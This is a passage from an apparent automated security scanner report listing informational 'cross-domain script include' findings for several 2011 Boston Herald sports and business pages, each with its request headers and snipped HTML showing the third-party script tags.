src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.589. http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:49:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/celtics/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.590. http://www.bostonherald.com/blogs/sports/rap_sheet/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/rap_sheet/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /blogs/sports/rap_sheet/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:48:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 115344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.591. http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:49:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.592. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:50:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<td>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.593. http://www.bostonherald.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /business/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:07:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 89129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.594. http://www.bostonherald.com/business/automotive/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/automotive/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/automotive/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:22:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.595. http://www.bostonherald.com/business/automotive/view/20110127gm_says_it_no_longer_needs_govt_loan_to_go_green/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/automotive/view/20110127gm_says_it_no_longer_needs_govt_loan_to_go_green/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/automotive/view/20110127gm_says_it_no_longer_needs_govt_loan_to_go_green/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:22:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.596. http://www.bostonherald.com/business/automotive/view/20110128electric-car_batteries_spur_curiosity_questions/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/automotive/view/20110128electric-car_batteries_spur_curiosity_questions/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/automotive/view/20110128electric-car_batteries_spur_curiosity_questions/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:21:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
